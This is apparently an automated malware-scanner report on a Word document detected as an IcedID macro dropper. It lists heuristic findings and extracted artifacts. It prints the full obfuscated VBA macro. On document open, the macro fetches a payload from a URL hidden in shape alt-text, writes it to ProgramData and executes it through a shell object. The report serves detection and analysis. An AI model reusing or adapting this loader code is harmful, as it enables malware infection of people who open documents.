MALICIOUS
230
Risk Score
Heuristics 6
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set FmGql = CreateObject("Script" + aRVnL) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11732 bytes |
SHA-256: e9dd1196c82d54f36d529a273201f9a28297be9e3ca35a7a5be77faf6ef818e5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qlBCv"
Sub ZoSTL(OpypT, Optional ByVal yFWyV As String = "c:\programdata\xtOuz.txt", Optional ByVal aRVnL As String = "ing.FileSystemObject")
' Dub understatement drop
' Diabetic pavings detecting shovelful dilapidation
' Pits martyr revanchist guy enjoying
' Cox aerobatic frantically
' Constitutional
' Intoning student atonal dauphin occurred
' Deadlier arbitrated lobotomised
' Mastiff bastardisation
' Enshrines pang regina sward
' Wicketkeeper egg promulgation licenses
' Breast implied hurray malt livelihoods
' Condoned magnificence islander
' Coon efface theologically diphthongs recordings
' Lauded
' Essentials nipples experimenters
' Aidedecamp held transatlantic
' Goodbye
Set FmGql = CreateObject("Script" + aRVnL)
' Swab cowgirl blanked suitable
' Rewordings brainless
' Mopes cola passed ids
' Antigens platters victimises iconographic
' Falsely stiller
Set mYHbs = FmGql.CreateTextFile(yFWyV)
' Importing scourge
' Eastbound unearthed chastely telegraph
' Crowned anechoic
' Henpeck assort
mYHbs.WriteLine OpypT
' Workload
' Marquee triffid printing fabricator
' Literacy sentenced determined callipers vainest
' Towpaths clemency her unpronounceable tartan reclined
' Bearskin tidying
mYHbs.Close
' Towpath convenience pursuit
' Brays
' Plaster significance
' Legume mall abbe jubilantly enshrined
' Disinterred fringing stammered statement
' Hayfever impolite spa
' Brawniest
' Collarless twigs
' Discontinuance scourge
' Cancers corneas afternoons attenuator mecca posts
' Uproars shafted
' Addressing eruptions fulsomely emirates wilts
' Inuit kaiser
' Destruct wrasse endoscope copywriter impeach
' Cowriter suzerainty outages cryptology
' Alts dribbles
' Parasitised extortion unacceptably idle tucked
' Petrochemical stellar
' Fijians wellmarked televised
' Unclimbed
' Recent
' Typifying shockers rightward direct
' Unscrambled gyroscopes treatment
' Preys warpaint photostat rubicon phosphoric tobogganing
' Derails communing luxurious conscientious girded
' Resonances
' Barbiturate uninitiated hullo dampest icecream
' Choose
' Motivator frazzled bumps
' Auctioneer froze reactivities
' Garble
' Flyer wherewith wettest
' Ultrasound bleakest examinations
' Coppice refineries reconquer
' Potencies colonised differentiable legacy prurience
' Controversies spectrometer notches celluloid
End Sub
' Costs fled angular hauls juridic
' Burn conjurers
' Alfatah pleaded
' Captor prosecutorial stairwells spanning innards
' Ulcer oddity sandpit uniform confection
' Following
' Reimbursing interviewing disaster existential facsimiles
Sub AutoOpen()
' Validates marinate sponger
' Liars adjuster handedness
' Jailing donors
' Slurred daughters previewing toolboxes westward
' Drummer orate forty assassination pulchritude
' Shouts parachutists unseasonal
' Harangues rissole
' Net keel prosperously
' Flare encouraged
' Mandril daemon irretrievable
' Soaking audits
' Deterioration throatiest roofing overtaken
' Impales augury
' Blenders macroeconomics vermin anniversaries
' Enthralled parched schoolboy
' Unsystematic schwa entities
' Hurdlers corks liars halite rococo motivation
' Slaloms impeaches contacted richest
' Exalted solely applaud welcomer mascots shredder
' Fends demographic engendered hardwoods
' Director fundamentals coercions ah
' Scoured unusably starting itinerant
' Preciseness rendezvoused arrangements amalgam
' Melanomas crucial
' Metaphors unattached deciles characterless
' Forks scoreline
' Splittable delving
' Bipedalism jolts dazzle
Dim pYbPc As New UqPjU
' Maligns lawmakers
' Calorie hurtle cowgirl eyeballs
' Infill hairraising pigs
' Recomputes criterion piranhas swallowing rusty
' Carnivores ladder hunkers cornflower gnarling forename
' Unfreeze scaffold treasurers cottages
OpypT = pYbPc.BRotJ("MSXML2.serverXMLHTTP")
' Tons genome
' Tracheal censored
' Chapped messy chestnut decreeing bureaucracy players
' Outgo toileting thirties
' Menfolk albany statesmanlike
' Legion hostility gallons folkart contracting
ZoSTL AzDRk(OpypT)
' Cells
' Kayak clinching planktonic
' Hydrodynamical vain dimmest radiographers
' Marching phototypesetter asunder drowsy detour skirmishes
' Procedures jumbo
' Endorsed posit synonymy
' Wavefront inhales sickens
' Pancaked overtness cohabiting lime demurred
' Decaying cat
' Bookish thirsting unions
KHQmw IPSxZ(0) + "vr32 c:\programdata\xtOuz.txt", "ws"
End Sub
Function uvSyV(luHOy, gNfaN)
' Financially relegates
' Laze inroads corded
' Bemused husbandman stationmaster crosschecking
' Takes bonanzas rotund
' Likening canisters limbless
uvSyV = Split(luHOy, gNfaN)
End Function
Attribute VB_Name = "gvXzI"
' Head sugarcoated conscripts aardvark
' Paceman
' Disbandment blinker
' Scores clipped
' Hotplates furrow heaved dismount
Function AzDRk(pLUuo)
' Snapshot nudist undertone
' Plague minim cruciform investiture respiratory
' Rewound meows
' Courtesans lumberjack
' Jurisdictions
' Exasperated wands drop unbearably decoratively
AzDRk = StrConv(pLUuo, vbUnicode)
' Museums
' Greasepaint petals pilaster craftiest effluvia
' Stuff dappled theorists hooky
' Bumblers adjournment
' Ditches tweeters strewing gem
End Function
' Virulent
' Sodomy freezer mogul millpond amulets
' Cedars unrevealing prickling
' Tactical scouting garbled splittings
' Denier predictors
' Morasses abounding hurried
' Tubeless contagion regulate
' Approval isolate reticent
Function nEDVs()
' Piecing evaluational crookedness footstep
' Naturalised conducting
' Rite polled
' Quivered multiplied juggling prognostication tropospheric
' Sprinted prolongs
' Trampled resetting
' Disestablishing lit
' Outfall greasiest
' Joyride aftershave nozzle
' Unpack bust bikes
With ActiveDocument.shapes(1)
nEDVs = .AlternativeText
End With
End Function
' Nested photographic asterisked challenged requisitioning
' Spotlessly balloting ushers tweeds dross preparedness immutably confetti
' Dosages mirages minuets unformed telephoto overrun
' Waging dieted manufacturer rescheduling experimentation
Function IPSxZ(sHfVc)
' Negotiable granular scripting unfitness molluscs
' Lexicographical exhaustive radiators hulking retests
' Cardiologist loosing
' Mail sicknesses inventiveness
' Heartiest
' Whitecollar invocations aimer unemployment
' Bookmarks fog
' Mothered nasalised numeric
' Pharmaceuticals scorches frogman pakistan
' Lithological opioids have
' Subcontractors nato affably twofaced
' Totemic
' Resurface breathing lamp peartrees meritocratic
Ydwnu = nEDVs()
bvaug = uvSyV(Ydwnu, "###")
kFwPX = bvaug(sHfVc)
IPSxZ = kFwPX
End Function
Attribute VB_Name = "UqPjU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Interjecting characterful
' Kriegspiel colander
' Seduce rotators
' Parked twinkle growths preadolescent shimmer
' Unclouded resprayed
Function BRotJ(HfQXY)
' Schizophrenics counterpoise defies
' Reintegration homesickness reasonableness forbade
' Headroom
' Fiches uninvented french orphan
' Salsa scarf
' Reachieved phylogeny reanimating
Dim ZoIiK As Object
' Decks newts expulsion
' Unfulfilled
' Exotically respectability
' Aggravating crunchier heterodoxy palmy
' Routinely guilder scenery
' Rearrange dubbed giftware nutty atrociously whip
' During philologist moistened
' Frustum deepfried cutest intimately
' Boxing collagen warheads
' Charmless
' Wheelie interim weirdest packet
Set ZoIiK = CreateObject(HfQXY)
' Childminders jumping warmth
' Unlace greened aluminum
' Powersharing spaces marshmallow handling
' Suites withers
' Emulsifies multiprocessing pestering
' Suitor
' Changer levitated crumpling reproof midfielders
' Amethysts
' Uncoils ho smooth daddy rowdy
' Wintriest siphons
' Penance backfires
' Wastefully conquests pallor sonic morphogenesis
' Antiquated
' Lards binocular coarsest
' Externalised chlorinated chassis
' Tipster
' Overseen brokerage nerd exiles
' Manoeuvrings
' Misting chessmen
' Abuser cardholders
' Bookends
' Reach
' Candidatures irretrievably camber
' Equivocal intense fro boats marketeer duplication
' Sanitised bother centennial
irjSZ = IPSxZ(1)
' Crinkled
' Besetting compendiums sweetening
' Committing
' Falsifier joyfulness imaginary matte peckers epochs
' Principle firs versed censure
' Diplexers steppe
ZoIiK.Open "GET", Reverse(irjSZ), False
' Mafiosi
' Highlight unmemorable renewal
' Winner torpedo barrage sparsely wellmeaning
' Jailbird inhospitable polymerised guessing
' Singing kettle minty pudding
ZoIiK.Send
' Truest vary heeled conservationist brit oddness
' Tonguetwister altarpieces
' Bolsters received gerundive conjurer taboo
' Paragraphs foamier augmentations goodhumouredly
' Lagune pantaloons lawmakers extinctions
' Commandeer mush
BRotJ = ZoIiK.responsebody
End Function
Attribute VB_Name = "GgTNR"
Sub KHQmw(unton, aENZm)
' Ganglia immutable tonality soapbox
' Carbolic mortgages automatically razzmatazz
' Manageability rectory gimmick warlord
' Yon winds etch brushwood
' Gilt standardised hikes scrums
' Generating
Set QVNOo = CreateObject(aENZm + "cript.shell")
' Mishitting skullduggery earmark
' Leans curliness exasperation pinning slimmed judgments
' Approves quadrupeds blinks
' Hoards
' Songs counts inbred
' Telegraphic augers fixated
' Statical giraffe commercialised
' Briefed emphatic segmental warmest precursor
' Concerto mimetic
' Extruded wetness
' Unattenuated unimagined unemotional bart
' Java later
' Rhyming forgot threats slings prudishness
' Promotions perchance flared suspends
' Razors billionaires
' Duodenal adaptive consortium encamp exhaustively eminently stupefying
' Upstream prayer
' Hastens replicating situational
' Haversack feebler taverns
' Retaliates verticality sprightlier grind
' Graduations reroutes
' Kindest
' Reassured nauseousness
' Steers mousses pounced fourteenth sustains
' Imbued
' Centrifuges unbarred exemplification laminated
' Cuds uncollected
' Stewardess vivacity poodles suppliant
' Incapacitating coronets
' Ferromagnetic junkies periphrastic uncrackable
' Colonists preferentially
' Performances seared gritting
' Praise disillusionment
' Liturgies idealistic summertime spews
' Burbled querulous coherent aerodynamics abattoir
' Revivals extensibility
' Atoll debating bemuse enamoured
' Seismological uplinks
' Consort polymorphisms
' Innovated filter ecclesiastical
' Contextually kaleidoscope assume
' Ideologists superciliously yens
' Peeps affectionately coiffure counterfeit elaborating
' Dreadfulness genially
' Sojourn amplifications brasiers terribly pityingly penumbra
' Communicativeness centralise excitedly forsworn scouting
QVNOo.exec unton
' Imbibe shades
' Kites sweepers
' Doggedly
' Florida renamed negated homozygous
' Editorships purl unrequited
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 44032 bytes |
SHA-256: aaf0781635a21ccba0ad8f1c944f19a4142ba8e2f252b9925aaa5b3737ee2f19 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.